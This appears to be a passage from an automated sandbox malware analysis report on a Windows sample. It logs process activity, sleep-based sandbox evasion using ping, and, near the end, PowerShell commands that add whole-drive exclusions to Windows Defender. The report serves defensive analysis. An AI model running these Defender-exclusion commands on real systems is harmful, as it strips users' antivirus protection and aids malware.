Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Window / User API: threadDelayed 9998	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4215	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3265	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6731	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2958	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7199	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2464	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7571
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1680

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe TID: 2800	Thread sleep time: -99980s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 4215 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 3265 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 612	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968	Thread sleep count: 6731 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 2958 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5096	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924	Thread sleep count: 7199 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872	Thread sleep count: 2464 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep count: 7571 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep count: 1933 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5708	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640	Thread sleep count: 7883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292	Thread sleep count: 1680 > 30

Source: C:\Windows\System32\ReAgentc.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Thread sleep count: Count: 9998 delay: -10

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: ReAgentc.exe, 00000010.00000002.2212377513.00000288C9735000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: curl.exe, 00000007.00000003.2180548349.000001B169854000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe

Code function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040ADD6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00409FD0 SetUnhandledExceptionFilter,		0_2_00409FD0
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	Code function: 0_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,		0_2_00409FB0

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'"
